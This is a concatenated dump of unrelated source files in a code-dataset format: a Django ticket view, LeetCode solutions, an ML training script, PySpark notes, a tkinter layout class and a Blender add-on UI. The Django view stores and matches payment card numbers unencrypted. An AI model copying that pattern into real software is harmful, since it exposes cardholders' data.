personas_serializer.is_valid(raise_exception=True)\n problemas_serializer.is_valid(raise_exception=True)\n\n tipo_ticket = problemas_serializer.validated_data[\"idtipoticket\"]\n data_ticket = problemas_serializer.validated_data\n\n if tipo_ticket.idtipoticket == CARD_TICKET_TYPE:\n try:\n tarjeta_serializer.is_valid(raise_exception=True)\n except serializers.ValidationError as exc:\n return Response(\n {\n \"detail\": f\" Validation failed, please include tarjeta in the request, verbose {exc}\"\n },\n status=status.HTTP_400_BAD_REQUEST,\n )\n tarjeta, created = self.create_tarjeta(tarjeta_serializer.validated_data)\n data_ticket[\"idtarjeta\"] = tarjeta\n tarjeta = JtarjetasSerializer(\n tarjeta, context={\"request\": request}\n ).data\n \n else:\n tarjeta = {}\n created = False\n\n with transaction.atomic():\n persona, created_persona = self.create_persona(\n personas_serializer.validated_data\n )\n\n data_ticket[\"idpersona\"] = persona\n\n try:\n ticket = Jproblemas.objects.create(**data_ticket)\n except ValidationError as exc:\n return Response({\"detail\": exc}, status=status.HTTP_403_FORBIDDEN)\n\n person_serializer = JpersonasSerializer(\n persona, context={\"request\": request}\n )\n ticket_serializer = JproblemasSerializer(\n ticket, context={\"request\": request}\n )\n\n return Response(\n {\n \"nueva persona\": created_persona,\n \"nueva tarjeta\": created,\n \"tarjeta\": tarjeta,\n \"persona\": person_serializer.data,\n \"ticket\": ticket_serializer.data,\n },\n status=status.HTTP_201_CREATED,\n )\n\n @staticmethod\n def create_persona(data):\n persona, created = Jpersonas.objects.update_or_create(\n identificacion=data[\"identificacion\"],\n defaults=data\n )\n return persona, created\n\n @staticmethod\n def create_tarjeta(data):\n # Use the provided unencrypted numerotarjeta value\n numerotarjeta = data[\"numerotarjeta\"]\n all_cards = Jtarjetas.objects.filter(\n idmarcatarjeta=data[\"idmarcatarjeta\"],\n idtipotarjeta=data[\"idtipotarjeta\"],\n idclasetarjeta=data[\"idclasetarjeta\"]\n )\n created = True\n for card in all_cards:\n if card.numerotarjeta == numerotarjeta:\n created = False\n return card, created\n \n tarjeta = Jtarjetas.objects.create(**data)\n return tarjeta, created\n\n\n \n \n \n","repo_name":"carlosviniharo/keta","sub_path":"keta/tickets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"72685181664","text":"from typing import List\n\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n \"\"\"\n https://leetcode.com/problems/best-time-to-buy-and-sell-stock-with-cooldown/discuss/75927/Share-my-thinking-process\n\n buy[i]: The maximum profit can be made if the first i days end with buy or wait.\n E.g \"buy, sell, buy\" or \"buy, cooldown, cooldown\"\n sell[i]: The maximum profit can be made if the first i days end with sell or wait.\n E.g \"buy, sell, buy, sell\" or \"buy, sell, cooldown, cooldown\"\n price: prices[i - 1], which is the stock price of the i-th day\n \"\"\"\n\n if len(prices) < 2:\n return 0\n\n sell, buy = 0, -prices[0]\n prev_sell, prev_buy = 0, 0\n for price in prices:\n prev_buy = buy\n buy = max(prev_sell - price, prev_buy)\n prev_sell = sell\n sell = max(prev_buy + price, prev_sell)\n\n return sell\n\n# buy[i]: means before day i what is the maxProfit for any sequence end with buy.\n# sell[i]: means before day i what is the maxProfit for any sequence end with sell.\n# rest[i]: means before day i what is the maxProfit for any sequence end with rest.\n#\n# (rest means no transaction on that day aka. cooldown)\n#\n# deduce the transition functions for them\n#\n# buy[i] = max(rest[i-1]-price, buy[i-1])\n# sell[i] = max(buy[i-1]+price, sell[i-1])\n# rest[i] = max(sell[i-1], buy[i-1], rest[i-1])\n#\n# to make sure sell before buy => buy[i] <= rest[i] (rest[i] <= sell[i]) => rest[i] = sell[i-1]\n#\n# buy[i] = max(sell[i-2]-price, buy[i-1])\n# sell[i] = max(buy[i-1]+price, sell[i-1])\n#\n# states of day i relies only on i-1 and i-2 => reduce space to O(1)\n","repo_name":"daviddwlee84/LeetCode","sub_path":"Python3/Array/BestTimeToBuyAndSellStockWithCooldown/DP309.py","file_name":"DP309.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"7"} +{"seq_id":"3763685740","text":"import argparse\nimport torch\nimport transformers\nfrom transformers import GPT2LMHeadModel, BertModel, GPT2Tokenizer, BertTokenizer\nimport datasets\nfrom datasets import load_dataset, load_metric, concatenate_datasets, Dataset\nfrom transformers import Trainer, TrainingArguments\nfrom tqdm import tqdm\nimport json\nimport wandb\n\nimport random\n\nfrom model import AE\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--pretrained_encoder\", type=str, default=\"bert-base-uncased\")\nparser.add_argument(\"--pretrained_decoder\", type=str, default=\"gpt2-medium\")\nparser.add_argument('--model_dir', default='../model/priorcontrol/')\nparser.add_argument(\"--no_cuda\", action=\"store_true\")\nparser.add_argument(\"--latent_size\", type=int, default=768)\nparser.add_argument(\"--latent_num\",type=int, default=1)\nparser.add_argument(\"--seq_len_per_latent\",type=int, default=20)\nparser.add_argument(\"--batch_size\", type=int, default=100)\nparser.add_argument(\"--epoch\",type=int, default=200)\nparser.add_argument(\"--lr\",type=float, default=1e-4)\nparser.add_argument(\"--fp16\", action=\"store_true\")\nparser.add_argument(\"--wandb\", action=\"store_true\")\nparser.add_argument(\"--no_fix\", action=\"store_true\")\nparser.add_argument(\"--max_length\", type=int, default=100)\nparser.add_argument(\"--model_path\", type=str, default='../model/multicontrol/checkpoint-30000/pytorch_model.bin')\nparser.add_argument(\"--variation\", type=float, default=1e-3)\n\n#prior\nparser.add_argument(\"--not_prior\", action=\"store_true\")\nparser.add_argument(\"--flow_num\", type=int, default=8)\nparser.add_argument(\"--prior_num\", type=int, default=8)\n\n#adv_z_prior\nparser.add_argument(\"--adv_z_prob_loss\", type=float, default=None)\nparser.add_argument(\"--adv_z_prob_grouping\", default=json.dumps([[0,1],[2,3,4,5],[6,7]]))\n\n#adv_x_prior\nparser.add_argument(\"--adv_x_prob_loss\", type=float, default=None)\n\n#prior_classify_loss\n\nparser.add_argument(\"--prior_classify_loss\", type=float, default=0.3)\nparser.add_argument(\"--prior_classifier_head_num\", type=int, default=3)\nparser.add_argument(\"--prior_classifier_class_num_per_head\", type=str, default=json.dumps([2,2,4]))\nparser.add_argument(\"--prior_classifier_mid_size\", type=int, default=128)\n\nargs = parser.parse_args()\n\nif not args.not_prior:\n args.prior = True\nelse:\n args.prior = False\n\nif args.wandb:\n wandb.login()\n wandb.init(project=\"\", entity=\"\")#your account\n\n\n\n\nadv_z_prob_args = None\nprior_classify_args = None\n\nloss_list = {}\nif args.adv_z_prob_loss is not None:\n loss_list['adv_z_prob_loss'] = args.adv_z_prob_loss\n adv_z_prob_args = {\n \"grouping\": json.loads(args.adv_z_prob_grouping)\n }\n\nif args.adv_x_prob_loss is not None:\n loss_list['adv_x_prob_loss'] = args.adv_x_prob_loss\n\nif args.prior_classify_loss is not None:\n loss_list['prior_classify_loss'] = args.prior_classify_loss\n prior_classify_args = {\n 'head_num':args.prior_classifier_head_num, \n 'class_num_per_head':json.loads(args.prior_classifier_class_num_per_head),\n 'mid_size':args.prior_classifier_mid_size\n }\n\n\n\n\nencoder_tokenizer = BertTokenizer.from_pretrained(args.pretrained_encoder)\nencoder = BertModel.from_pretrained(args.pretrained_encoder)\ndecoder_tokenizer = GPT2Tokenizer.from_pretrained(args.pretrained_decoder)\ndecoder = GPT2LMHeadModel.from_pretrained(args.pretrained_decoder)\ndecoder_tokenizer.pad_token = decoder_tokenizer.eos_token\n\n\n\n\nmodel = AE(encoder=encoder, decoder=decoder, args=args)\nmodel.load_state_dict(torch.load(args.model_path), strict=False)\n\n\nmodel.set_losslist(loss_list, adv_z_prob_args=adv_z_prob_args, prior_classify_args=prior_classify_args)\n\n\nif not args.no_fix:\n model.fix_decoder()\n\nmodel.set_mode('prior')\n\n\ndataset = [{'sent':[]} for i in range(8)]\n\nwith open('../data/IMDb/IMDb.txt', 'r') as f:\n for line in f.readlines():\n line = json.loads(line)\n label = int(line[0])\n dataset[0+label]['sent'].append(line[1].strip())\n #dataset[0]['type'].append(int(line[0]))\n\nwith open('../data/AGnews/AG-data.txt', 'r') as f:\n for line in f.readlines():\n line = json.loads(line)\n label = int(line[0])\n dataset[2+label]['sent'].append(line[1].strip())\n #dataset[1]['type'].append(int(line[0]))\n\nwith open('../data/ToxicComment/Toxic.txt', 'r') as f:\n for line in f.readlines():\n line = json.loads(line)\n label = int(line[0])\n dataset[6+label]['sent'].append(line[1].strip())\n #dataset[2]['type'].append(int(line[0]))\n\n\n\ncolumns = ['encoder_input_ids', 'encoder_attention_mask', 'encoder_token_type_ids']\nadv_columns = ['adv_input_ids', 'adv_attention_mask', 'adv_token_type_ids']\n\nif args.adv_x_prob_loss is not None:\n train_dataset = {i:[] for i in (columns + adv_columns)}\nelse:\n train_dataset = {i:[] for i in columns}\n\nif args.prior_classify_loss is not None:\n train_dataset['head_index'] = []\n train_dataset['pos_label'] = []\ntrain_dataset['prior_head_index']=[]\n\n#for i in range(8):\n\nif args.adv_x_prob_loss is not None:\n #####adv_data\n adv_sent = dataset[3]['sent'] + dataset[4]['sent'] + dataset[5]['sent']\n random.shuffle(adv_sent)\n adv_dataset = {'sent':adv_sent}\n\n tmp_dataset = Dataset.from_dict(adv_dataset)\n tmp_dataset = tmp_dataset.map(lambda e: encoder_tokenizer(e['sent'], max_length=args.max_length, padding='max_length', truncation=True), batched=True)\n tmp_dataset = tmp_dataset.rename_columns({'input_ids':'adv_input_ids', 'attention_mask':'adv_attention_mask', 'token_type_ids':'adv_token_type_ids'})\n tmp_dataset.set_format(type='torch', columns=['adv_input_ids', 'adv_token_type_ids', 'adv_attention_mask'])\n adv_dataloader = torch.utils.data.DataLoader(tmp_dataset, batch_size=(args.batch_size * 3))\n \n\nif args.prior_classify_loss is not None:\n label_dict=[[0,0],[0,1],[2,0],[2,1],[2,2],[2,3],[1,0],[1,1]]\n\n\n#for i in [2,3,4,5]:\nfor i in range(8):\n tmp_dataset = Dataset.from_dict(dataset[i])\n tmp_dataset = tmp_dataset.map(lambda e: encoder_tokenizer(e['sent'], max_length=args.max_length, padding='max_length', truncation=True), batched=True)\n tmp_dataset = tmp_dataset.rename_columns({'input_ids':'encoder_input_ids', 'attention_mask':'encoder_attention_mask', 'token_type_ids':'encoder_token_type_ids'})\n tmp_dataset.set_format(type='torch', columns=['encoder_input_ids', 'encoder_token_type_ids', 'encoder_attention_mask'])\n tmp_dataloader = torch.utils.data.DataLoader(tmp_dataset, batch_size=args.batch_size)\n for cnt in iter(tmp_dataloader):\n for k in columns:\n train_dataset[k].append(cnt[k].tolist())\n train_dataset['prior_head_index'].append(i)\n if args.prior_classify_loss is not None:\n train_dataset['head_index'].append(label_dict[i][0])\n train_dataset['pos_label'].append([label_dict[i][1]]*args.batch_size)\n \n if args.adv_x_prob_loss is not None:\n for adv_cnt in iter(adv_dataloader):\n for k in adv_columns:\n train_dataset[k].append(adv_cnt[k].tolist())\n\n \n\n\ntrain_dataset = Dataset.from_dict(train_dataset)\n\nult_columns = columns + ['prior_head_index']\nif args.adv_x_prob_loss is not None:\n ult_columns = ult_columns + adv_columns\n #train_dataset.set_format(columns=columns+adv_columns+['prior_head_index'])\nif args.prior_classify_loss is not None:\n ult_columns = ult_columns + ['head_index', 'pos_label']\n #train_dataset.set_format(columns=columns+['prior_head_index'])\n\ntrain_dataset.set_format(columns=ult_columns)\n\n\n\n\n\n\ntraining_args = TrainingArguments(\n output_dir=args.model_dir,\n learning_rate=args.lr,\n num_train_epochs=args.epoch,\n #gradient_accumulation_steps=4,\n per_device_train_batch_size=1,\n logging_dir='./logs',\n logging_steps=100,\n do_train=True,\n do_eval=False,\n no_cuda=args.no_cuda,\n save_strategy=\"steps\",\n save_steps=5000,\n fp16=args.fp16,\n report_to='wandb' if args.wandb else 'none'\n)\ntrainer = Trainer(\n model=model,\n args=training_args,\n train_dataset=train_dataset\n)\ntrain_out = trainer.train()\n","repo_name":"HappyGu0524/MultiControl","sub_path":"priorcontrol/train_prior_only.py","file_name":"train_prior_only.py","file_ext":"py","file_size_in_byte":8046,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"7"} +{"seq_id":"13272811619","text":"# JOIN DATA FRAMES\n\n# [LEFT].join([RIGHT], on=[PREDICATE] how=[METHOD])\n\n# Joining the DataFrames on 'affinity-id'\n# from pyspark.sql.functions import col\n# joined_df = (\n# br__series_contract.underwriting_spendings\n# .join(\n# br__contract.jumanji_runs,\n# col('br__series_contract.underwriting_spendings.affinity-id') == col('br__contract.jumanji_runs.affinity-id'),\n# 'inner'\n# )\n# )\n\nimport pyspark.sql.functions as F \n\napplied_hardcuts = (\n spark.table(\"table_a\")\n .where(F.col(\"hardcut_applied\") == True)\n .where(F.col(\"product\") == \"credit-card\")\n .where(F.col(\"hardcut_checked_at\") > \"2023-04-01\")\n .alias(\"hardcuts\"))\n\nblocked_tax_id_runs = (\n spark.table(\"table_b\")\n .where(F.col(\"run__affinity_type\") == \"xxx\")\n .withColumnRenamed(\"run__affinity_id\", \"affinity_id\")\n .drop(F.col(\"run__finished_at\"))\n .alias(\"runs\")\n .join(bv_cadastral_applied_hardcuts, F.col(\"hardcuts.underwriting__id\") == F.col(\"runs.affinity_id\"))\n .show(10))\n \n# IF we need to filter more than one column, we could use this:\n# .join(bv_cadastral_applied_hardcuts, (F.col(\"hardcuts.underwriting__id\") == F.col(\"runs.affinity_id\")) \n# & (F.col(\"hardcuts.tax_id\") == F.col(\"runs.tax_id\")))\n \n\n","repo_name":"pitz/pyspark-notes","sub_path":"notebooks/join.py","file_name":"join.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"44766546138","text":"import tkinter\nimport tkinter.font\nfrom browser.Text import Text\nfrom browser.DrawText import DrawText\nfrom browser.DrawRect import DrawRect\nfrom browser.Element import Element\nfrom browser.TextLayout import TextLayout\nfrom browser.LineLayout import LineLayout\n\nWIDTH, HEIGHT = 800, 600\nSCROLL_STEP = 100\nHSTEP, VSTEP = 13, 18\n\n\nclass InlineLayout:\n\n def __init__(self, node, parent, previous):\n self.FONTS = {}\n self.weight = \"normal\"\n self.style = \"roman\"\n self.size = 16\n self.node = node\n self.parent = parent\n self.previous = previous\n self.children = []\n\n def paint(self, display_list):\n bgcolor = self.node.style.get(\"background-color\",\n \"transparent\")\n if bgcolor != \"transparent\":\n x2, y2 = self.x + self.width, self.y + self.height\n rect = DrawRect(self.x, self.y, x2, y2, bgcolor)\n display_list.append(rect)\n\n for child in self.children:\n child.paint(display_list)\n\n def layout(self):\n self.width = self.parent.width\n self.x = self.parent.x\n if self.previous:\n self.y = self.previous.y + self.previous.height\n else:\n self.y = self.parent.y\n\n self.new_line()\n self.recurse(self.node)\n for line in self.children:\n line.layout()\n \n self.height = sum([line.height for line in self.children])\n # self.height = self.cursor_y - self.y\n\n def open_tag(self, tag):\n if tag == \"i\":\n self.style = \"italic\"\n elif tag == \"b\":\n self.weight = \"bold\"\n elif tag == \"small\":\n self.size -= 2\n elif tag == \"big\":\n self.size += 4\n elif tag == \"br\":\n self.flush()\n\n def close_tag(self, tag):\n if tag == \"/i\":\n self.style = \"roman\"\n elif tag == \"/b\":\n self.weight = \"normal\"\n elif tag == \"/small\":\n self.size += 2\n elif tag == \"/big\":\n self.size -= 4\n elif tag == \"/p\":\n self.flush()\n self.cursor_y += VSTEP\n\n # def token(self, tok):\n # if isinstance(tok, Text):\n # self.text(tok)\n # elif tok.tag == \"i\":\n # self.style = \"italic\"\n # elif tok.tag == \"/i\":\n # self.style = \"roman\"\n # elif tok.tag == \"b\":\n # self.weight = \"bold\"\n # elif tok.tag == \"/b\":\n # self.weight = \"normal\"\n # elif tok.tag == \"small\":\n # self.size -= 2\n # elif tok.tag == \"/small\":\n # self.size += 2\n # elif tok.tag == \"big\":\n # self.size += 4\n # elif tok.tag == \"/big\":\n # self.size -= 4\n # elif tok.tag == \"br\":\n # self.flush()\n # elif tok.tag == \"/p\":\n # self.flush()\n # self.cursor_y += VSTEP\n\n\n def text(self, node):\n color = self.node.style[\"color\"]\n weight = self.node.style[\"font-weight\"]\n style = self.node.style[\"font-style\"]\n if style == \"normal\":\n style = \"roman\"\n size = int(float(self.node.style[\"font-size\"][:-2]) * .75)\n font = self.get_font(size, weight, style)\n for word in node.text.split():\n w = font.measure(word)\n if self.cursor_x + w > self.width - HSTEP:\n self.new_line()\n # self.cursor_y += font.metrics(\"linespace\") * 1.25\n cursor_x = HSTEP\n line = self.children[-1]\n text = TextLayout(node, word, line, self.previous_word)\n line.children.append(text)\n self.previous_word = text\n self.cursor_x += w + font.measure(\" \")\n\n def new_line(self):\n self.previous_word = None\n self.cursor_x = self.x\n last_line = self.children[-1] if self.children else None\n new_line = LineLayout(self.node, self, last_line)\n self.children.append(new_line)\n\n def flush(self):\n if not self.line: return\n metrics = [font.metrics() for x, word, font, color in self.line]\n max_ascent = max([metric[\"ascent\"] for metric in metrics])\n baseline = self.cursor_y + 1.25 * max_ascent\n for x, word, font, color in self.line:\n y = baseline - font.metrics(\"ascent\")\n self.display_list.append((x, y, word, font, color))\n self.cursor_x = self.x\n self.line = []\n max_descent = max([metric[\"descent\"] for metric in metrics])\n self.cursor_y = baseline + 1.25 * max_descent\n\n def get_font(self, size, weight, slant):\n key = (size, weight, slant)\n if key not in self.FONTS:\n font = tkinter.font.Font(size=self.size, weight=weight, slant=slant)\n self.FONTS[key] = font\n return self.FONTS[key]\n\n def recurse(self, node):\n if isinstance(node, Text):\n self.text(node)\n else:\n if node.tag == \"br\":\n self.flush()\n for child in node.children:\n self.recurse(child)\n\n def __repr__(self) -> str:\n return f\"InlineLayout(y={self.y}, height={self.height})\"\n\n","repo_name":"acz995/pythonProject","sub_path":"browser/InlineLayout.py","file_name":"InlineLayout.py","file_ext":"py","file_size_in_byte":5215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7625471345","text":"from setuptools import setup\r\n\r\nwith open(\"README.md\", \"r\") as fh:\r\n long_description = fh.read()\r\n\r\nsetup(\r\n name = 'pySerialTransfer',\r\n packages = ['pySerialTransfer'],\r\n version = '2.1.7',\r\n description = 'Python package used to transmit and receive low overhead byte packets - especially useful for PC<-->Arduino USB communication (compatible with https://github.com/PowerBroker2/SerialTransfer)',\r\n long_description = long_description,\r\n long_description_content_type = \"text/markdown\",\r\n author = 'Power_Broker',\r\n author_email = 'gitstuff2@gmail.com',\r\n url = 'https://github.com/PowerBroker2/pySerialTransfer',\r\n download_url = 'https://github.com/PowerBroker2/pySerialTransfer/archive/2.1.7.tar.gz',\r\n keywords = ['Arduino', 'serial', 'usb', 'protocol', 'communication'],\r\n classifiers = [],\r\n install_requires = ['pyserial']\r\n)\r\n","repo_name":"PowerBroker2/pySerialTransfer","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"7"} +{"seq_id":"45492929379","text":"class Solution(object):\n def countSubstrings(self, s):\n # aaaabaabaa 单数中心:b, aba, aabaa; 偶数中心:aa, aaaa\n # 1.定义一个spread函数,扩散次数=回文子串个数\n def spread(s, left, right):\n # count为扩散次数,没扩散一次增加一个新的回文子串\n count = 0\n # 循环遍历字符串s,如果char[left] = char[right]则 count+1\n while left >= 0 and right < len(s) and s[left] == s[right]:\n left -= 1\n right += 1\n count += 1\n return count\n # 2.按回文类型分类讨论\n result = 0\n # 循环遍历字符串s的角标\n for i in range(len(s)):\n result += spread(s, i, i) # 单数中心\n for i in range(len(s)- 1):\n result += spread(s, i, i + 1) #偶数中心\n return result\n\n","repo_name":"YujieFan/leetcode","sub_path":"647.py","file_name":"647.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6151052612","text":"if \"bpy\" in locals():\n import importlib\n for mod in [\n gen_functions,\n imp_functions,\n sys_functions,\n operators,\n settings\n ]:\n importlib.reload(mod)\nelse:\n import bpy\n from . import (\n gen_functions,\n imp_functions,\n sys_functions,\n operators,\n settings\n )\n\n\nclass AlphaTreesPrefs(bpy.types.AddonPreferences):\n bl_idname = __package__\n\n show_extra_operators: bpy.props.BoolProperty(\n name=\"Show extra operators\",\n default = True,\n )\n\n def draw(self, context):\n layout = self.layout\n layout.prop(self, \"show_extra_operators\")\n\n# class PreviewMenu(bpy.types.Menu):\n# bl_idname = \"ALPHATREE_MT_preview_options\"\n# bl_label = \"Previews\"\n\n# def draw(self, context):\n# layout = self.layout\n\n# layout.operator(operators.ALPHATREE_OT_multi_import.bl_idname, text=\"Multi import\", icon = \"DOCUMENTS\")\n\nclass ALPHATREE_UL_SystemList(bpy.types.UIList):\n \"\"\"UIlist for the particle systems\"\"\"\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n custom_icon = 'PARTICLES'\n\n if self.layout_type in {'DEFAULT', 'COMPACT'}:\n row = layout.row(align = True)\n row.prop(item, \"name\", text=\"\", emboss=False, icon=custom_icon)\n\n if item.show_viewport:\n row.prop(item, \"show_viewport\", text=\"\", emboss=False, icon=\"RESTRICT_VIEW_OFF\")\n else:\n row.prop(item, \"show_viewport\", text=\"\", emboss=False, icon=\"RESTRICT_VIEW_ON\")\n\n if item.show_render:\n row.prop(item, \"show_render\", text=\"\", emboss=False, icon=\"RESTRICT_RENDER_OFF\")\n else:\n row.prop(item, \"show_render\", text=\"\", emboss=False, icon=\"RESTRICT_RENDER_ON\")\n\n elif self.layout_type in {'GRID'}:\n layout.alignment = 'CENTER'\n layout.prop(item, \"name\", text=\"\", emboss=False, icon=custom_icon)\n\nclass ALPHATREE_PT_import_panel(bpy.types.Panel):\n \"\"\"Import panel\"\"\"\n bl_space_type = \"VIEW_3D\"\n bl_context = \"objectmode\"\n bl_region_type = \"UI\"\n bl_label = \"Alpa trees importer\"\n bl_category = \"Alpha Trees\"\n\n def draw(self, context):\n layout = self.layout\n at = bpy.context.scene.alpha_trees\n\n row = layout.row(align=True)\n row.prop(at,\"import_type\",expand = True,)\n\n if at.import_type == \"PARTICLE\":\n\n if context.object:\n sys_list, sys_settings, index, psystems, item = sys_functions.get_system_vars(self,context)\n\n row = layout.row(align = True)\n row.template_list(\"ALPHATREE_UL_SystemList\", \"The_List\", context.object, \"sys_list\", context.object.sys_settings, \"index\")\n column = row.column()\n col = column.column(align=True)\n actions_name = operators.ALPHATREE_OT_sys_list_actions.bl_idname\n col.operator(actions_name, text=\"\", icon=\"ADD\").action = \"ADD\"\n row = col.row(align = True)\n if not sys_list:\n row.enabled = False\n row.operator(actions_name, text=\"\", icon=\"REMOVE\").action = \"REMOVE\"\n\n if sys_list:\n if len(sys_list) >= 2:\n col = column.column(align=True)\n col.operator(actions_name, text=\"\", icon=\"TRIA_UP\").action = \"UP\"\n col.operator(actions_name, text=\"\", icon=\"TRIA_DOWN\").action = \"DOWN\"\n\n #settings row\n row = layout.row()\n row.label(text=item.sys_name)\n\n row = layout.row(align=True)\n if item.particle_settings == \"NONE\":\n row.prop(item, \"particle_settings\", text=\"\", icon=\"SETTINGS\", icon_only=True)\n row.operator(operators.ALPHATREE_OT_new_settings.bl_idname, text=\"New settings\", icon=\"ADD\")\n return\n\n row.prop(item, \"particle_settings\", text=\"\", icon=\"SETTINGS\")\n row.operator(operators.ALPHATREE_OT_new_settings.bl_idname, text=\"\", icon=\"ADD\")\n row.operator(operators.ALPHATREE_OT_remove_settings.bl_idname, text=\"\", icon=\"REMOVE\")\n\n box = layout.box()\n boxcol = box.column(align=True)\n boxcol.template_icon_view(item, \"selected_tree\", scale=6, scale_popup=7, show_labels=True)\n\n col = layout.column(align = True)\n boxcol = col.box().column()\n row = boxcol.row()\n\n #particle settings\n if at.show_particle_settings:\n row.prop(at, \"show_particle_settings\", text = \"\", icon = \"TRIA_DOWN\")\n row.label(text=\"Settings\")\n\n psettings = bpy.data.particles[item.particle_settings]\n psys = psystems[psystems.find(item.sys_name)]\n\n boxcol = col.box().column()\n boxcol.use_property_split = True\n boxcol.prop(psys, \"seed\")\n boxcol.prop(psettings, \"count\")\n boxcol.prop(psettings, \"particle_size\", text=\"Size\")\n boxcol.prop(psettings, \"size_random\")\n boxcol.prop(item, \"random_rotation\", slider=True)\n boxcol.prop(psettings, \"display_percentage\", text=\"Viewport\")\n else:\n row.prop(at, \"show_particle_settings\", text = \"\", icon = \"TRIA_RIGHT\")\n row.label(text=\"Settings\")\n\n #materials\n if item.selected_tree != \"default.png\":\n\n col = layout.column(align = True)\n boxcol = col.box().column()\n row = boxcol.row()\n\n if at.show_material_settings:\n row.prop(at, \"show_material_settings\", text = \"\", icon = \"TRIA_DOWN\")\n row.label(text=\"Material\")\n boxcol = col.box().column()\n\n object = bpy.data.collections[item.particle_settings].objects[item.particle_settings.replace(\"AT_PSYSTEM_\",\"\")]\n control_node = object.material_slots[0].material.node_tree.nodes[\"Alpha trees control\"]\n imp_functions.draw_material_settings(context, boxcol, control_node)\n else:\n row.prop(at, \"show_material_settings\", text = \"\", icon = \"TRIA_RIGHT\")\n row.label(text=\"Material\")\n\n else:\n\n imp_functions.draw_preview_enum(\n self,\n context,\n layout,\n [operators.ALPHATREE_OT_change_tree, operators.ALPHATREE_OT_reload_previews, operators.ALPHATREE_OT_multi_import],\n at,\n \"alpha_trees_previews\"\n )\n\n #row = layout.row()\n #row.alignment = \"CENTER\"\n #row.label(text = at.alpha_trees_previews[:-19])\n\n row = layout.row()\n row.scale_y = 1.8\n row.operator(\"alpha_tree.import_tree\", icon=\"VOLUME_DATA\", text = \"Import: \" + at.alpha_trees_previews[:-19])\n\n\nclass ALPHATREE_PT_overall_settings(bpy.types.Panel):\n \"\"\"Overall settings panel\"\"\"\n bl_space_type = \"VIEW_3D\"\n bl_context = \"objectmode\"\n bl_region_type = \"UI\"\n bl_label = \"Overall settings\"\n bl_category = \"Alpha Trees\"\n bl_parent_id = \"ALPHATREE_PT_import_panel\"\n bl_options = {\"DEFAULT_CLOSED\"}\n\n @classmethod\n def poll(cls, context):\n at = context.scene.alpha_trees\n return at.import_type == \"PARTICLE\"\n\n def draw(self, context):\n layout = self.layout\n at = context.scene.alpha_trees\n\n col = layout.column(align=True)\n col.use_property_split = True\n col.prop(at,\"particle_rotation\")\n\nclass ALPHATREE_PT_material_settings(bpy.types.Panel):\n \"\"\"Material settings panel\"\"\"\n bl_space_type = \"VIEW_3D\"\n bl_context = \"objectmode\"\n bl_region_type = \"UI\"\n bl_label = \"Material settings\"\n bl_category = \"Alpha Trees\"\n bl_parent_id = \"ALPHATREE_PT_import_panel\"\n bl_options = {\"DEFAULT_CLOSED\"}\n\n @classmethod\n def poll(cls, context):\n object = context.object\n\n if context.scene.alpha_trees.import_type == \"PARTICLE\":\n return False\n\n if not object:\n return False\n\n elif not object.material_slots:\n return False\n\n elif not object.material_slots[0].material:\n return False\n\n elif not object.material_slots[0].material.use_nodes:\n return False\n\n elif not object.material_slots[0].material.node_tree.nodes:\n return False\n\n try:\n _ = object.material_slots[0].material.node_tree.nodes[\"Alpha trees control\"]\n except KeyError:\n return False\n\n return True\n\n def draw(self, context):\n layout = self.layout\n object = context.active_object\n control_node = object.material_slots[0].material.node_tree.nodes[\"Alpha trees control\"]\n\n col = layout.column(align = True)\n imp_functions.draw_material_settings(context,col, control_node)\n\n\nclass ALPHATREE_PT_gen_panel(bpy.types.Panel):\n \"\"\"Generator panel\"\"\"\n bl_space_type = \"VIEW_3D\"\n bl_context = \"objectmode\"\n bl_region_type = \"UI\"\n bl_label = \"Alpa trees generator\"\n bl_category = \"Alpha Trees\"\n bl_options = {\"DEFAULT_CLOSED\"}\n\n def draw(self, context):\n prefs = context.preferences.addons[__package__].preferences\n at = bpy.context.scene.alpha_trees\n layout = self.layout\n if prefs.show_extra_operators:\n gen_functions.dropdown_operator(\n layout,\n context,\n name=\" Alpha Trees\",\n operators=[\"alpha_tree.set_up_tree\",\"alpha_tree.render_maps\", \"alpha_tree.open_folder\", ],\n icons=[\"SORT_DESC\",\"RESTRICT_RENDER_OFF\", \"FILEBROWSER\", ],\n operator_booleans=[at.show_setup_tree_settings,at.show_render_settings, at.show_open_folder_settings, ],\n operator_boolean_strings=[\"show_setup_tree_settings\", \"show_render_settings\", \"show_open_folder_settings\", ],\n operator_settings=[[\"border_padding\"], [\n \"resolution\", \"render_filepath\", \"diff_render\", \"nor_render\", \"mask_render\", \"overwrite\", \"remove_extra_masks\", ], [\"open_leaf_folder\"]],\n setttings_toggle=[[], [False, False,True, True, True, False, False], []]\n )\n\n # else:\n # row = layout.row()\n # row.alignment = \"RIGHT\"\n # row.prop(at, \"show_info\", text=\"\", icon=\"INFO\", emboss=False)\n # col = layout.column()\n # col.scale_y = 0.8\n # if at.show_info:\n # functions.draw_info(col)\n\n gen_functions.operator_settings(\n layout,\n context,\n bool=at.show_exec_all_settings,\n bool_string=\"show_exec_all_settings\",\n operator=\"alpha_tree.execute_all\",\n settings=[[\"Render border\"], \"border_padding\", [\"Rendering\"],\n \"resolution\", \"render_filepath\", \"diff_render\", \"nor_render\", \"mask_render\", \"overwrite\", \"remove_extra_masks\",[\"Open renders folder\"], \"open_renders_folder\"],\n settings_toggle = [False,False,False,False,False,True,True,True,False,False,False,False,],\n icon=\"DRIVER\",\n scale=1.75)\n\nclasses = [\n ALPHATREE_PT_import_panel,\n ALPHATREE_PT_gen_panel,\n ALPHATREE_PT_material_settings,\n ALPHATREE_PT_overall_settings,\n ALPHATREE_UL_SystemList,\n 